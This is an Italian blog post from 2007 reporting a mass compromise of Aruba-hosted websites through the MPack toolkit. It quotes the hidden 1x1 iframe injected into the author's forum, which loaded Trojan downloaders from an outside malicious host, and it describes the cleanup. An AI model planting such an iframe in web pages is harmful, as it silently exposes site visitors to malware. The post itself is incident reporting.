.:: Securnetwork.net Blog - Massimo Rabbi ::.

Blog personale di Massimo Rabbi con le ultime news in fatto di sicurezza, software, sistemi operativi e tecnologia
  • rss
  • Inizio
  • Contact Me
  • Curriculum Vitae
  • Università
  • Downloads

Server Aruba sotto attacco: siti web italiani nel mirino!

Massimo Rabbi | 19 June 2007 | 10:45

In questi ultimi giorni sui blog e sui siti web più disparati, non si è fatto altro che parlare del massiccio attacco subito da numerosi siti web hostati su server Aruba.
Il modus operandi rispecchia in pieno  quanto avvenuto  lo scorso mese per i sistemi di Hosting Solutions.
L’intrusione ha infatti consentito a degli attacker di modificare le pagine web di svariati siti web inserendo un IFRAME che effettuasse il redirect degli utenti verso siti web contenenti malware.
Di seguito riporto il link a tre articoli che spiegano molto bene l’accaduto:
- Server Aruba sotto attacco, allarme in Italia
- Possibile intrusione nei sistemi Aruba
- L’italia sotto pesante attacco malware
Dalle cose lette qui e in altre pagine sembra sia stato sfruttato un tool automatizzato per lanciare attacchi malware: il software in questione è chiamato MPACK.
Panda Software ha pubblicato un interessantissimo report che analizza nel dettaglio questo tool: lo potete scaricare qui.

Il problema ha interessato direttamente anche noi di TechTown. In particolar modo è stato colpito il forum con risultante inserimento del seguente frammento IFRAME:
<iframe src=”http://zaq-home.org/x/index.php” width=”1″ height=”1″></iframe>
Del problema mi son accorto grazie alla segnalazione di Kaspersky Internet Security che ha prontamente bloccato il tentativo di download di due malware, nella fattispecie due Trojan.Downloader.

Trojan blocked by Kaspersky

Acid ha rimosso il problema che sembra fosse dovuto ad una modifica nel campo templates del database del forum dove sembra sia stato aggiunto il codice, in particolare il board wrappers.
Abbiamo proceduto anche  ad una verifica dei file dell’intero ftp e cercato di verificare se tutto fosse funzionante.
Nel frattempo Aruba sembra non dire nulla a riguardo. Penso che una comunicazione via mail globale a tutti i propri utenti sarebbe stata cosa buona e giusta, per informare del possibile pericolo e del possibile coinvolgimento nell’attacco di questo o quel server anche in base alle tante segnalazioni degli utenti.
Il consiglio è quello di tenere sempre l’antivir aggiornato, meglio se di quelli che hanno la funzionalità integrata di web protection.

Categorie
Mondo WWW, Sicurezza, Software, Virus & Spyware
Commenti RSS
Commenti RSS
Trackback
Trackback

« Possibile attacco DoS contro un driver Kaspersky Chiuso pericoloso bug in Apple TV »

Lascia un commento

Puoi usare questi tag : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Pages

  • Contact Me
  • Curriculum Vitae
  • Università

Raccomandazioni

  • Seo
  • Aprire negozio online

Recommended Sites

Categories

  • Apple (27)
  • Fun & Games (17)
  • Guide e HowTo (2)
  • Hardware (41)
  • Libri e Riviste (1)
  • Microsoft (106)
  • Mondo WWW (135)
  • Musica (2)
  • Networking (43)
  • News dal blog (24)
  • OpenSource (64)
  • Personale (66)
  • Programmazione (19)
  • Riflessioni e considerazioni (43)
  • Sicurezza (204)
  • Sistemi operativi (80)
  • Software (250)
  • Telefonia (21)
  • Tips & Tricks (3)
  • Virus & Spyware (47)

Spam Blocked

40,182 spam comments
blocked by
Akismet

Statistiche

Sponsors II


*NIX Distro

  • Anonym.OS
  • Arudius
  • BackTrack
  • Security Distros

Blog

  • 11 Settembre
  • 7 in condotta!
  • Andrea Beggi
  • BufferOverflow
  • Emanuele Mattei
  • Il Disinformatico
  • Nococozza
  • OssBlog
  • Roundhouse Kicks
  • Shannon.it
  • Sicurezza Informatica
  • Sicurezza, ICT e altro

Blogs Microsoft

  • Blog TechNet
  • Marco Russo
  • Microsoft Security
  • Raffaele Rialdi

Friends

  • Capsula
  • Codega
  • Davide Ferrario
  • Filippo Roson
  • Giova
  • Lino Possamai
  • Massimiliano Barletta
  • Moleshkino
  • Quielainsieme
  • Renzo Gazzi

Musica

  • 3 Doors Down
  • Demagogue Rock
  • GemBoy
  • GreenDay
  • Iron Maiden
  • Linkin’ Park
  • Metallica
  • Moravagine
  • Nirvana
  • Noise Avalanche
  • Offspring
  • Tobias Sammet
  • Winter Dust

Sicurezza

  • Bugtraq Mailing List Archive
  • Database Security
  • Exploit
  • Government Security
  • HackerHigh School
  • Honeynet Project
  • McAfee Research
  • RootKit
  • Secunia
  • Security Focus
  • Security Freak Videos
  • Security Wireless
  • SysWall
  • Zero-Day Tracker
  • Zone-H

Tecnologia on-line

  • BrainWeb.it
  • Hardware Upgrade
  • HTML Code Tutorial
  • My old page
  • Punto Informatico
  • Siforge
  • TechTown.IT
  • The Register
  • Tom’s Hardware

SPONSORS III

Altro


BlogItalia.it - La directory italiana dei blog


rss Commenti RSS valid xhtml 1.1 design by jide powered by Wordpress get firefox